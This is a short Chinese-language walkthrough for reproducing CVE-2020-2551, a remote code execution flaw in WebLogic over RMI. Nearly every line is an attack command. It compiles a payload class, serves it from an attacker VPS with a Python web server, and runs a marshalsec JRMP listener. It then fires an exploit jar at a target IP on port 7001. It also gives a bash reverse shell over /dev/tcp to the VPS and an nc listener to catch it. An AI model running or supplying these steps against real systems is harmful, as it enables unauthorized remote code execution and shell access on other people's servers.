0x01 复现
RMI方式:
1.vps 生成exp.class(示例为windows弹计算器,如果想反弹linux shell 把命令改成bash -i >& /dev/tcp/vps/4444 0>&1,然后vps用nc -lvvp 4444 监听本地端口即可,用java1.6版本编译成功率高)
javac -source 1.6 -target 1.6 exp.java
2.vps 在当前目录开一个web服务,记得在vps上开防火墙策略
python -m SimpleHTTPServer 80(python2)
python3 -m http.server 80(python3)
3.vps 通过marshalsec开放JRMP监听本地端口 2222,调用RMI服务(#后的内容代表调用的class文件名)
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer “http://vps/#exp” 2222
4.本地 攻击,使目标服务器访问vps的2222端口,运行exp
java -jar CVE-2020-2551-master.jar 目标ip 7001 rmi://vps:2222/exp
ps:最后一步最好在本机执行,vps上可能会遇到环境不一致的问题。(op